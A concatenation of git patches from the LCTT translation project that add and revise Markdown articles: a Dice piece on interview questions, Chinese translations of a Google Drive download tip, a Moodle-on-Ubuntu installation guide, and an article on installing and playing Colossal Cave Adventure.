+The annual [Open Source Jobs Report][1] from Dice and The Linux Foundation reveals a lot about prospects for open source professionals and hiring activity in the year ahead. In this year's report, 86 percent of tech professionals said that knowing open source has advanced their careers. Yet what happens with all that experience when it comes time for advancing within their own organization or applying for a new roles elsewhere?
+
+Interviewing for a new job is never easy. Aside from the complexities of juggling your current work while preparing for a new role, there's the added pressure of coming up with the necessary response when the interviewer asks "Do you have any questions for me?"
+
+At Dice, we're in the business of careers, advice, and connecting tech professionals with employers. But we also hire tech talent at our organization to work on open source projects. In fact, the Dice platform is based on a number of Linux distributions and we leverage open source databases as the basis for our search functionality. In short, we couldn't run Dice without open source software, therefore it's vital that we hire professionals who understand, and love, open source.
+
+Over the years, I've learned the importance of asking good questions during an interview. It's an opportunity to learn about your potential new employer, as well as better understand if they are a good match for your skills.
+
+Here are three essential questions to ask and the reason they're important:
+
+**1\. What is the company 's position on employees contributing to open source projects or writing code in their spare time?**
+
+The answer to this question will tell you a lot about the company you're interviewing with. In general, companies will want tech pros who contribute to websites or projects as long as they don't conflict with the work you're doing at that firm. Allowing this outside the company also fosters an entrepreneurial spirt among the tech organization, and teaches tech skills that you may not otherwise get in the normal course of your day.
+
+**2\. How are projects prioritized here?**
+
+As all companies have become tech companies, there is often a division between innovative customer facing tech projects versus those that improve the platform itself. Will you be working on keeping the existing platform up to date? Or working on new products for the public? Depending on where your interests lie, the answer could determine if the company is a right fit for you.
+
+**3\. Who primarily makes decisions on new products and how much input do developers have in the decision-making process?**
+
+This question is one part understanding who is responsible for innovation at the company (and how close you'll be working with him/her) and one part discovering your career path at the firm. A good company will talk to its developers and open source talent ahead of developing new products. It seems like a no brainer, but it's a step that's sometimes missed and will mean the difference between a collaborative environment or chaotic process ahead of new product releases.
+
+Interviewing can be stressful, however as 58 percent of companies tell Dice and The Linux Foundation that they need to hire open source talent in the months ahead, it's important to remember the heightened demand puts professionals like you in the driver's seat. Steer your career in the direction you desire.
+
+[Download ][2] the full 2017 Open Source Jobs Report now.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/os-jobs/2017/12/3-essential-questions-ask-your-next-tech-interview
+
+作者:[Brian Hostetter][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/brianhostetter
+[1]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/
+[2]:http://bit.ly/2017OSSjobsreport
From 7faacd0728be36875f184e350f390c30324dc78c Mon Sep 17 00:00:00 2001
From: datastruct
Date: Sat, 6 Jan 2018 18:57:43 +0800
Subject: [PATCH 105/371] Update 20171214 How to Install Moodle on Ubuntu
16.04.md
---
sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 8cd5d5fdd8..9a6a2e9a98 100644
--- a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,3 +1,5 @@
+Translating by stevenzdg988
+
How to Install Moodle on Ubuntu 16.04
======
![How to Install Moodle on Ubuntu 16.04][1]
From e0cd85702e6e2771e9228d002f6ad1b3f1eb0628 Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Sat, 6 Jan 2018 21:51:06 +0800
Subject: [PATCH 106/371] Fix image links and rebuild file format
---
...ogle Drive And Download 10 Times Faster.md | 45 +++++++++++++++----
1 file changed, 37 insertions(+), 8 deletions(-)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
index bf28c77328..7105b9fb8c 100644
--- a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -1,8 +1,10 @@
# 直接保存文件至 Google Drive 并用十倍的速度下载回来
+![][image-1]
+
最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
-[downloading miui update from chorme](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+[使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
@@ -16,34 +18,61 @@
### *第二步*
前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
-[savetodrive to save files to cloud drive](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+[savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
-[http://www.zdnet.com/article/linux-totally-dominates-supercomputers/](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+[请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
### *第三步*
你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
-[savetodrive download file directly to cloud](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+[savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
-[google drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+[Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
-[how to download miui update from browser](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+[如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
所以就是这样的,我经常用这样的方法下载文件,最令人惊讶的是,这个服务是完全免费的。
----
+
+----
+
+
via: http://www.theitstuff.com/save-files-directly-google-drive-download-10-times-faster
作者:[Rishabh Kandari](http://www.theitstuff.com/author/reevkandari)
-译者:[Drshu]
+译者:[Drshu][10]
校对:[校对者ID]((null))
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+
+
+[1]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
+[2]: https://savetodrive.net/
+[3]: http://www.savetodrive.net
+[4]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[5]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[6]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[7]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[8]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
+[9]: http://www.theitstuff.com/author/reevkandari
+[10]: https://github.com/Drshu
+[11]: https://github.com/%E6%A0%A1%E5%AF%B9%E8%80%85ID
+[12]: https://github.com/LCTT/TranslateProject
+[13]: https://linux.cn/
+
+[image-1]: http://www.theitstuff.com/wp-content/uploads/2017/11/Save-Files-Directly-To-Google-Drive-And-Download-10-Times-Faster.jpg
+[image-2]: http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png
+[image-3]: http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png
+[image-4]: http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg
+[image-5]: http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png
+[image-6]: http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png
+[image-7]: http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png
\ No newline at end of file
From d8756f98785e35b9b4e71524cd1dea16b198962c Mon Sep 17 00:00:00 2001
From: datastruct
Date: Sat, 6 Jan 2018 22:54:51 +0800
Subject: [PATCH 107/371] Update 20171214 How to Install Moodle on Ubuntu
16.04.md
---
...4 How to Install Moodle on Ubuntu 16.04.md | 98 +++++++++----------
1 file changed, 45 insertions(+), 53 deletions(-)
diff --git a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 9a6a2e9a98..326b558044 100644
--- a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,71 +1,64 @@
-Translating by stevenzdg988
+Translated by stevenzdg988
-How to Install Moodle on Ubuntu 16.04
+怎样在 Ubuntu 16.04 下安装 Moodle(魔灯”)
======
-![How to Install Moodle on Ubuntu 16.04][1]
+![怎样在 Ubuntu 16.04 下安装 Moodle```“魔灯”```][1]
-Step-by-step Installation Guide on how to Install Moodle on Ubuntu 16.04. Moodle (acronym of Modular-object-oriented dynamic learning environment') is a free and open source learning management system built to provide teachers, students and administrators single personalized learning environment. Moodle is built by the Moodle project which is led and coordinated by [Moodle HQ][2]
+关于如何在 Ubuntu 16.04 上按照指南逐步安装 Moodle 请继续往下看。Moodle (模块化面向对象动态学习环境的简称)是一种免费开源学习管理系统,为教师、学生和管理员提供个性化的学习环境。Moodle 由 Moodle 项目创建,由 [Moodle 总部][2]统一领导和协调。
-,
+**Moodle有很多非常实用的功能,比如:**
-**Moodle comes with a lot of useful features such as:**
+ * 现代和易于使用的界面
+ * 个性化仪表盘
+ * 协作工具和活动
+ * 一体式日历
+ * 简单的文本编辑器
+ * 进度跟踪
+ * 公告
+ * 不胜枚举…
- * Modern and easy to use interface
- * Personalised Dashboard
- * Collaborative tools and activities
- * All-in-one calendar
- * Simple text editor
- * Track progress
- * Notifications
- * and many more…
-
-
-
-In this tutorial we will guide you through the steps of installing the latest version of Moodle on an Ubuntu 16.04 VPS with Apache web server, MySQL and PHP 7.
-
-### 1. Login via SSH
+在本教程中,我们将指导您在 Ubuntu 16.04 VPS 上利用 Apache web服务器、MySQL 和 PHP 7 安装最新版本的 Moodle。
+### 1. 通过 SSH 登录
First of all, login to your Ubuntu 16.04 VPS via SSH as user root
+首先,利用```root(是 Linux 和 Unix 系统中的超级管理员用户帐户,该帐户拥有整个系统至高无上的权力,所有对象他都可以操作。)```用户通过 SSH 登录到 Ubuntu 16.04 VPS
+### 2. 更新操作系统软件包
-### 2. Update the OS Packages
-
-Run the following command to update the OS packages and install some dependencies
+运行以下命令更新系统软件包并安装一些依赖软件
```
apt-get update && apt-get upgrade
apt-get install git-core graphviz aspell
```
-### 3. Install Apache Web Server
+### 3. 安装 Apache Web Server```(Apache WEB 服务器)```
-Install Apache web server from the Ubuntu repository
+利用下面命令,从 Ubuntu 软件仓库安装 Apache Web 服务器
```
apt-get install apache2
```
-### 4. Start Apache Web Server
+### 4. 启动 Apache Web Server
-Once it is installed, start Apache and enable it to start automatically upon system boot
+一旦安装完毕,启动 Apache 并使它能够在系统启动时自动启动,利用下面命令:
```
systemctl enable apache2
```
-### 5. Install PHP 7
+### 5. 安装 PHP 7
-Next, we will install PHP 7 and some additional PHP modules required by Moodle
+接下来,我们将安装 PHP 7 和 Moodle 所需的一些额外的 PHP 模块,命令是:
```
apt-get install php7.0 libapache2-mod-php7.0 php7.0-pspell php7.0-curl php7.0-gd php7.0-intl php7.0-mysql php7.0-xml php7.0-xmlrpc php7.0-ldap php7.0-zip
```
-### 6. Install and Configure MySQL Database Server
+### 6. 安装和配置 MySQL Database Server```MySQL 数据库服务器```
-Moodle stores most of its data in a database, so we will install MySQL database server
+Moodle 将大部分数据存储在数据库中,所以我们将利用以下命令安装 MySQL 数据库服务器
```
apt-get install mysql-client mysql-server
```
-
-After the installation, run the `mysql_secure_installation` script to set your MySQL root password and secure your MySQL installation.
-
-Login to the MySQL server as user root and create a user and database for the Moodle installation
+安装完成后,运行`mysql_secure_installation`脚本配置 MySQL 根用户```root```密码并确保 MySQL 得以安装。
+利用根用户```root```登录到 MySQL 服务器,并为 Moodle 创建一个数据库以及能访问它的用户,以下是具体操作指令:
```
mysql -u root -p
mysql> CREATE DATABASE moodle;
@@ -74,28 +67,28 @@ mysql> FLUSH PRIVILEGES;
mysql> \q
```
-Don't forget to replace 'PASSWORD' with an actual strong password.
+一定要记得将`‘PASSWORD’`替换成一个安全性高强点的密码。
-### 7. Get Moodle from GitHub repository
+### 7. 从 GitHub ```(是一个面向开源及私有软件项目的托管平台)``` 知识库获取 Moodle
-Next, change the current working directory and clone Moodle from their official GitHub repository
+接下来,切换到当前工作目录并从 GitHub 官方知识库(存储库)中复制 Moodle`(Git是一个开源的分布式版本控制系统,可以有效、高速的处理从很小到非常大的项目版本管理。其中要利用到命令 git。以下同)`
```
cd /var/www/html/
git clone https://github.com/moodle/moodle.git
```
-Go to the '/moodle' directory and check all available branches
+切换到`“/moodle”`目录,检查所有可用的分支
```
cd moodle/
git branch -a
```
-Select the latest stable version (currently it is MOODLE_34_STABLE) and run the following command to tell git which branch to track or use
+选择最新稳定版本(目前它是 MOODLE_34_ ),运行以下命令告诉 git 哪个分支可以跟踪或使用
```
git branch --track MOODLE_34_STABLE origin/MOODLE_34_STABLE
```
-and checkout the specified version
+并切换至这个特定版本
```
git checkout MOODLE_34_STABLE
@@ -103,20 +96,20 @@ Switched to branch 'MOODLE_34_STABLE'
Your branch is up-to-date with 'origin/MOODLE_34_STABLE'.
```
-Create a directory for the Moodle data
+为存储 Moodle 数据创建目录
```
mkdir /var/moodledata
```
-Set the correct ownership and permissions
+正确设置其所有权和访问权限
```
chown -R www-data:www-data /var/www/html/moodle
chown www-data:www-data /var/moodledata
```
-### 8. Configure Apache Web Server
+### 8. 配置 Apache Web Server
-Create Apache virtual host for your domain name with the following content
+使用以下内容为您的域名创建 Apache 虚拟主机
```
nano /etc/apache2/sites-available/yourdomain.com.conf
@@ -135,7 +128,7 @@ nano /etc/apache2/sites-available/yourdomain.com.conf
```
-save the file and enable the virtual host
+保存文件并启用虚拟主机
```
a2ensite yourdomain.com
@@ -144,25 +137,24 @@ To activate the new configuration, you need to run:
service apache2 reload
```
-Finally, reload the web server as suggested, for the changes to take effect
+最后,重启 Apache WEB 服务器,以使配置生效
```
service apache2 reload
```
-### 9. Follow the on-screen instructions and complete the installation
+### 9. 接下来按照提示完成安装
-Now, go to `http://yourdomain.com` and follow the on-screen instructions to complete the Moodle installation. For more information on how to configure and use Moodle, you can check their [official documentation][4].
+现在,点击“http://yourdomain.com”`(在浏览器的地址栏里输入以上域名并访问 Apache WEB 服务器)`,按照提示完成Moodle的安装。有关如何配置和使用 Moodle 的更多信息,您可以查看其[官方文档][4]。
-You don't have to install Moodle on Ubuntu 16.04, if you use one of our [optimized Moodle hosting][5], in which case you can simply ask our expert Linux admins to install and configure the latest version of Moodle on Ubuntu 16.04 for you. They are available 24×7 and will take care of your request immediately.
-
-**PS.** If you liked this post on how to install Moodle on Ubuntu 16.04, please share it with your friends on the social networks using the buttons on the left or simply leave a reply below. Thanks.
+如果您使用我们的[优化的 Moodle 托管主机服务][5],您不必在 Ubuntu 16.04 上安装 Moodle,在这种情况下,您只需要求我们的专业 Linux 系统管理员在 Ubuntu 16.04 上安装和配置最新版本的 Moodle。他们将提供 24×7 及时响应的服务。
+**PS.** 如果你喜欢这篇关于如何在 Ubuntu 16.04 上安装 Moodle 的帖子,请在社交网络上与你的朋友分享,使用左边的按钮或者留下你的回复。谢谢。
--------------------------------------------------------------------------------
via: https://www.rosehosting.com/blog/how-to-install-moodle-on-ubuntu-16-04/
作者:[RoseHosting][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[stevenzdg988](https://github.com/stevenzdg988)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 370ccdcd0aedfeb5d7f647844f8049fefd4d5c7b Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Sat, 6 Jan 2018 22:57:44 +0800
Subject: [PATCH 108/371] Translated by stevenzdg988
---
.../tech/20171214 How to Install Moodle on Ubuntu 16.04.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {sources => translated}/tech/20171214 How to Install Moodle on Ubuntu 16.04.md (100%)
diff --git a/sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
similarity index 100%
rename from sources/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
rename to translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
From 8a426b9b5c3d3bda2cbd3d22b1d3a0626ee6108b Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 6 Jan 2018 23:08:14 +0800
Subject: [PATCH 109/371] =?UTF-8?q?=E5=B0=8F=E4=BF=AE=E6=94=B9?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20171214 How to Install Moodle on Ubuntu 16.04.md | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
index 326b558044..0422dbb2c3 100644
--- a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
+++ b/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
@@ -1,6 +1,4 @@
-Translated by stevenzdg988
-
-怎样在 Ubuntu 16.04 下安装 Moodle(魔灯”)
+怎样在 Ubuntu 16.04 下安装 Moodle(“魔灯”)
======
![怎样在 Ubuntu 16.04 下安装 Moodle```“魔灯”```][1]
From 7b8fc136caf251110fc2aead56b6c7254707e93b Mon Sep 17 00:00:00 2001
From: Shucheng <741932183@qq.com>
Date: Sat, 6 Jan 2018 23:12:53 +0800
Subject: [PATCH 110/371] Fixed image fomat and made it dispaly directly
---
...y To Google Drive And Download 10 Times Faster.md | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
index 7105b9fb8c..566424de98 100644
--- a/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
+++ b/translated/tech/20171120 Save Files Directly To Google Drive And Download 10 Times Faster.md
@@ -4,7 +4,7 @@
最近我不得不给我的手机下载更新包,但是当我开始下载的时候,我发现安装包过于庞大。大约有 1.5 GB
-[使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
+![使用 Chrome 下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/1-2-e1508771706462.png)
考虑到这个下载速度至少需要花费 1 至 1.5 小时来下载,并且说实话我并没有这么多时间。现在我下载速度可能会很慢,但是我的 ISP 有 Google Peering (Google 对等操作)。这意味着我可以在所有的 Google 产品,例如Google Drive, YouTube 和 PlayStore 中获得一个惊人的速度。
@@ -18,24 +18,24 @@
### *第二步*
前往链接[savetodrive](http://www.savetodrive.net) 并且点击相应位置以验证身份。
-[savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
+![savetodrive 将文件保存到 Google Drive ](http://www.theitstuff.com/wp-content/uploads/2017/10/3-1.png)
这将会请求获得使用你 Google Drive 的权限,点击 “Allow”
-[请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
+![请求获得 Google Drive 的使用权限](http://www.theitstuff.com/wp-content/uploads/2017/10/authenticate-google-account.jpg)
### *第三步*
你将会再一次看到下面的页面,此时仅仅需要输入下载链接在链接框中,并且点击 “Upload”
-[savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
+![savetodrive 直接给 Google Drive 上传文件](http://www.theitstuff.com/wp-content/uploads/2017/10/6-2.png)
你将会开始看到上传进度条,可以看到上传速度达到了 48 Mbps,所以上传我这个 1.5 GB 的文件需要 30 至 35 秒。一旦这里完成了,进入你的 Google Drive 你就可以看到刚才上传的文件。
-[Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
+![Google Drive savetodrive](http://www.theitstuff.com/wp-content/uploads/2017/10/7-2-e1508772046583.png)
这里的文件中,文件名开头是 *miui* 的就是我刚才上传的,现在我可以用一个很快的速度下载下来。
-[如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
+![如何从浏览器上下载 MIUI 更新](http://www.theitstuff.com/wp-content/uploads/2017/10/8-e1508772110385.png)
可以看到我的下载速度大概是 5 Mbps ,所以我下载这个文件只需要 5 到 6 分钟。
From 248323d7e5b3159f02d9b3aea5fd086243689c21 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 01:14:00 +0800
Subject: [PATCH 111/371] PRF:20171214 The Most Famous Classic Text-based
Adventure Game.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@yixunx 翻译的很好,用心了~
---
...amous Classic Text-based Adventure Game.md | 49 ++++++++++---------
1 file changed, 26 insertions(+), 23 deletions(-)
diff --git a/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
index 17dfb304a6..2419f94e1f 100644
--- a/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
+++ b/translated/tech/20171214 The Most Famous Classic Text-based Adventure Game.md
@@ -1,28 +1,32 @@
-最有名的经典文字冒险游戏
+巨洞冒险:史上最有名的经典文字冒险游戏
======
-**巨洞冒险**,又名 **ADVENT**、**Clossal Cave** 或 **Adventure**,是八十年代初到九十年代末最受欢迎的基于文字的冒险游戏。这款游戏还作为史上第一款“互动小说”类游戏而闻名。在 1976 年,一个叫 **Will Crowther** 的程序员开发了这款游戏的一个早期版本,之后另一位叫 **Don Woods** 的程序员改进了这款游戏,为它添加了许多新元素,包括计分系统以及更多的幻想角色和场景。这款游戏最初是为 **PDP-10** 开发的,这是一个历史悠久的大型计算机。后来,它被移植到普通家用台式电脑上,比如 IBM PC 和 Commodore 64。游戏的最初版使用 Fortran 开发,之后在八十年代初它被微软加入到 MS-DOS 1.0 当中。
+
+[巨洞冒险](https://zh.wikipedia.org/wiki/%E5%B7%A8%E6%B4%9E%E5%86%92%E9%9A%AA),又名 ADVENT、Clossal Cave 或 Adventure,是八十年代初到九十年代末最受欢迎的基于文字的冒险游戏。这款游戏还作为史上第一款“互动小说”类游戏而闻名。在 1976 年,一个叫 Will Crowther 的程序员开发了这款游戏的一个早期版本,之后另一位叫 Don Woods 的程序员改进了这款游戏,为它添加了许多新元素,包括计分系统以及更多的幻想角色和场景。这款游戏最初是为 PDP-10 开发的,这是一种历史悠久的大型计算机。后来,它被移植到普通家用台式电脑上,比如 IBM PC 和 Commodore 64。游戏的最初版使用 Fortran 开发,之后在八十年代初它被微软加入到 MS-DOS 1.0 当中。
![](https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.jpeg)
-1995 年发布的最终版本 **Adventure 2.5** 从来没有可用于现代操作系统的安装包。它已经几乎绝版。万幸的是,在多年之后身为开源运动提倡者的 **Eric Steven Raymond** 得到了原作者们的同意之后将这款经典游戏移植到了现代操作系统上。他把这款游戏开源并将源代码以 **”open-adventure“** 之名托管在 GitLab 上。
+1995 年发布的最终版本 Adventure 2.5 从来没有可用于现代操作系统的安装包。它已经几乎绝版。万幸的是,在多年之后身为开源运动提倡者的 Eric Steven Raymond (ESR)得到了原作者们的同意之后将这款经典游戏移植到了现代操作系统上。他把这款游戏开源并将源代码以 “open-adventure” 之名托管在 GitLab 上。
-你在这款游戏的主要目标是找到一个传言中藏有大量宝藏和金子的洞穴并活着离开它。玩家在这个虚拟洞穴中探索时可以获得分数。一共可获得的分数是 430 点。这款游戏的灵感主要来源于原作者 **Will Crowther** 丰富的洞穴探索的经历。他曾经积极地在洞穴中冒险,特别是肯塔基州的猛犸洞。因为游戏中的洞穴结构大体基于猛犸洞,你也许会注意到游戏中的场景和现实中的猛犸洞的相似之处。
+你在这款游戏的主要目标是找到一个传言中藏有大量宝藏和金子的洞穴并活着离开它。玩家在这个虚拟洞穴中探索时可以获得分数。一共可获得的分数是 430 点。这款游戏的灵感主要来源于原作者 Will Crowther 丰富的洞穴探索的经历。他曾经经常在洞穴中冒险,特别是肯塔基州的猛犸洞。因为游戏中的洞穴结构大体基于猛犸洞,你也许会注意到游戏中的场景和现实中的猛犸洞的相似之处。
### 安装巨洞冒险
-Open Adventure 在 [**AUR**][1] 上有面对 Arch 系列操作系统的安装包。所以我们可以在 Arch Linux 或者像 Antergos 和 Manjaro Linux 等基于 Arch 的发行版上使用任何 AUR 辅助程序安装这款游戏。
+Open Adventure 在 [AUR][1] 上有面对 Arch 系列操作系统的安装包。所以我们可以在 Arch Linux 或者像 Antergos 和 Manjaro Linux 等基于 Arch 的发行版上使用任何 AUR 辅助程序安装这款游戏。
+
+使用 [Pacaur][2]:
-使用 [**Pacaur**][2]:
```
pacaur -S open-adventure
```
-使用 [**Packer**][3]:
+使用 [Packer][3]:
+
```
packer -S open-adventure
```
-使用 [**Yaourt**][4]:
+使用 [Yaourt][4]:
+
```
yaourt -S open-adventure
```
@@ -32,52 +36,53 @@ yaourt -S open-adventure
首先安装依赖项:
在 Debian 和 Ubuntu 上:
+
```
sudo apt-get install python3-yaml libedit-dev
```
-在 Fedora 上:
+在 Fedora 上:
```
sudo dnf install python3-PyYAML libedit-devel
```
-你也可以使用 pip 来安装 PyYAML:
+你也可以使用 `pip` 来安装 PyYAML:
+
```
sudo pip3 install PyYAML
```
安装好依赖项之后,用以下命令从源代码编译并安装 open-adventure:
+
```
git clone https://gitlab.com/esr/open-adventure.git
-```
-```
make
-```
-```
make check
```
-最后,运行 ‘advent’ 程序开始游戏:
+最后,运行 `advent` 程序开始游戏:
+
```
advent
```
-在 [**Google Play store**][5] 上还有这款游戏的安卓版。
+在 [Google Play 商店][5] 上还有这款游戏的安卓版。
### 游戏说明
要开始游戏,只需在终端中输入这个命令:
+
```
advent
```
-你会看到一个欢迎界面。按 “y” 来查看教程,或者按 “n“ 来开始冒险之旅。
+你会看到一个欢迎界面。按 `y` 来查看教程,或者按 `n` 来开始冒险之旅。
![][6]
-游戏在一个小砖房前面开始。玩家需要使用由一到两个简单的英语单词单词组成的命令来控制角色。要移动角色,只需输入 **in**、 **out**、**enter**、**exit**、**building**、**forest**、**east**、**west**、**north**、**south**、**up** 或 **down** 等指令。
+游戏在一个小砖房前面开始。玩家需要使用由一到两个简单的英语单词单词组成的命令来控制角色。要移动角色,只需输入 `in`、 `out`、`enter`、`exit`、`building`、`forest`、`east`、`west`、`north`、`south`、`up` 或 `down` 等指令。
-比如说,如果你输入 **”south“** 或者简写 **”s“**,游戏角色就会向当前位置的南方移动。注意每个单词只有前五个字母有效,所以当你需要输入更长的单词时需要使用缩写,比如要输入 **northeast** 时,只需输入 NE(大小写均可)。要输入 **southeast** 则使用 SE。要捡起物品,输入 **pick**。要进入一个建筑物或者其他的场景,输入 **in**。要从任何场景离开,输入 **exit**,诸如此类。当你遇到危险时你会受到警告。你也可以使用两个单词的短语作为命令,比如 **”eat food“**、**”drink water“**、**”get lamp“**、**”light lamp“**、**”kill snake“** 等等。你可以在任何时候输入 **”help“** 来显示游戏帮助。
+比如说,如果你输入 `south` 或者简写 `s`,游戏角色就会向当前位置的南方移动。注意每个单词只有前五个字母有效,所以当你需要输入更长的单词时需要使用缩写,比如要输入 `northeast` 时,只需输入 NE(大小写均可)。要输入 `southeast` 则使用 SE。要捡起物品,输入 `pick`。要进入一个建筑物或者其他的场景,输入 `in`。要从任何场景离开,输入 `exit`,诸如此类。当你遇到危险时你会受到警告。你也可以使用两个单词的短语作为命令,比如 `eat food`、`drink water`、`get lamp`、`light lamp`、`kill snake` 等等。你可以在任何时候输入 `help` 来显示游戏帮助。
![][8]
@@ -87,19 +92,17 @@ advent
我打通了许多关卡并在路上探索了各式各样的场景。我甚至找到了金子,还被一条蛇和一个矮人袭击过。我必须承认这款游戏真是非常让人上瘾,简直是最好的时间杀手。
-如果你安全地带着财宝离开了洞穴,你会取得游戏胜利,并获得财宝全部的所有权。你在找到财宝的时候也会获得部分的奖励。要提前离开你的冒险,输入 **”quit“**。要暂停冒险,输入 **”suspend“**(或者 ”pause“ 或 ”save“)。你可以在之后继续冒险。要看你现在的进展如何,输入 **”score“**。记住,被杀或者退出会导致丢分。
+如果你安全地带着财宝离开了洞穴,你会取得游戏胜利,并获得财宝全部的所有权。你在找到财宝的时候也会获得部分的奖励。要提前离开你的冒险,输入 `quit`。要暂停冒险,输入 `suspend`(或者 `pause` 或 `save`)。你可以在之后继续冒险。要看你现在的进展如何,输入 `score`。记住,被杀或者退出会导致丢分。
